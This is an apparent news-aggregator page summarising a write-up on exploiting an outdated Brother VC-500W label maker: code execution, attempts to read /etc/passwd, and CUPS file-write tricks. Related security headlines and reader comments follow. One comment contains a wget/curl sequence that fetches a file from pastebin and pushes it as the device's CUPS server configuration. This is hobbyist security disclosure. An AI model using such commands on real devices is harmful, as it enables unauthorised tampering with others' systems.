Pwning a Brother labelmaker, for fun and interop
The author explores vulnerabilities in a Brother label maker, discovering outdated software and potential exploits like executing arbitrary code. Challenges arise, including unintentional device configuration issues and limited understanding of printer systems.
Read original article
The article discusses the author's exploration of a Brother label maker, specifically the VC-500W model, which was found to be running outdated software, including a 2012 version of CUPS and an old Linux kernel on an ARMv5 architecture. The author discovered vulnerabilities in the device, such as the ability to execute arbitrary code through manipulating input fields in the setup utility. Attempts to exploit the vulnerabilities included trying to gain remote code execution and accessing system files like /etc/passwd. Despite encountering challenges and inadvertently causing issues with the device's configuration, the author continued to investigate potential exploits, including leveraging CUPS errors for arbitrary file write. Additionally, the author found a publicly accessible S3 bucket containing encrypted upgrade packages for the device, which could potentially be decrypted to create custom firmware. The article concludes with the author's reflections on the difficulty of exploiting the device further due to limited understanding of CUPS and printer systems.
Related
Hacking eInk Price Tags (2021)
Hackers repurpose eInk electronic shelf labels (ESLs) into photo frames or status displays by customizing firmware. Detailed exploration of hacking challenges, including Marvell chip analysis, bootloader functions, memory storage, communication protocols, and debugging methods.
Vulnerability in Popular PC and Server Firmware
Eclypsium found a critical vulnerability (CVE-2024-0762) in Intel Core processors' Phoenix SecureCore UEFI firmware, potentially enabling privilege escalation and persistent attacks. Lenovo issued BIOS updates, emphasizing the significance of supply chain security.
CVE-2021-4440: A Linux CNA Case Study
The Linux CNA mishandled CVE-2021-4440 in the 5.10 LTS kernel, causing information leakage and KASLR defeats. The issue affected Debian Bullseye and SUSE's 5.3.18 kernel, resolved in version 5.10.218.
The weirdest QNX bug I've ever encountered
The author encountered a CPU usage bug in a QNX system's 'ps' utility due to a 15-year-old bug. Debugging revealed a race condition, leading to code modifications and a shift towards open-source solutions.
RegreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems
A vulnerability in OpenSSH's server on glibc-based Linux systems (CVE-2024-6387) allows remote code execution. Exploiting this flaw requires precise timing. The advisory discusses exploitation details, success rates, and contacting developers for related issues.
14 comments> There's a CUPS version that's 10+ years old, Linux kernel almost old enough to drink, all of that r̶u̶n̶n̶i̶n̶g̶ crawling on an ARMv5.
> but it seems that they have one specific design and they're happy to milk it for as long and as cheap as possible
Like who fucking cares how old the CPU in a label printer is?
Here ya go, I fixed it (or just see the pastebin link if you're curious what it says):
wget -O conffile https://pastebin.com/raw/eGfKdvh8
curl ... \
--data-urlencode 'org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05' \
--data-urlencode 'OP=config-server' \
--data-urlencode "CUPSDCONF@conffile" \
--data-urlencode 'SAVECHANGES=Save+Changes' >/dev/nullBefore throwing it away, I looked at it and it contained classified information.
> pxplus_ibm_vga8regular
https://www.bing.com/search?q=%22pxplus_ibm_vga8regular%22+f...
Why is it only available from seedy foreign font sites?
I had a dymo d1 style label printer years ago and liked it, but it was a pain to get the backing to come off the labels when you wanted to stick them. (dymo labelmanager pnp)
Then I got a brother QL-1100 and it was a big step up. Labels easily come off the backing and if you want, 3rd party labels are cheap and available. I rarely pull out the dymo anymore. You can even print like from a database and it will spit out a pile of cut labels with no intervention. also linux software on github (haven't tried it)
Related
Hacking eInk Price Tags (2021)
Hackers repurpose eInk electronic shelf labels (ESLs) into photo frames or status displays by customizing firmware. Detailed exploration of hacking challenges, including Marvell chip analysis, bootloader functions, memory storage, communication protocols, and debugging methods.
Vulnerability in Popular PC and Server Firmware
Eclypsium found a critical vulnerability (CVE-2024-0762) in Intel Core processors' Phoenix SecureCore UEFI firmware, potentially enabling privilege escalation and persistent attacks. Lenovo issued BIOS updates, emphasizing the significance of supply chain security.
CVE-2021-4440: A Linux CNA Case Study
The Linux CNA mishandled CVE-2021-4440 in the 5.10 LTS kernel, causing information leakage and KASLR defeats. The issue affected Debian Bullseye and SUSE's 5.3.18 kernel, resolved in version 5.10.218.
The weirdest QNX bug I've ever encountered
The author encountered a CPU usage bug in a QNX system's 'ps' utility due to a 15-year-old bug. Debugging revealed a race condition, leading to code modifications and a shift towards open-source solutions.
RegreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems
A vulnerability in OpenSSH's server on glibc-based Linux systems (CVE-2024-6387) allows remote code execution. Exploiting this flaw requires precise timing. The advisory discusses exploitation details, success rates, and contacting developers for related issues.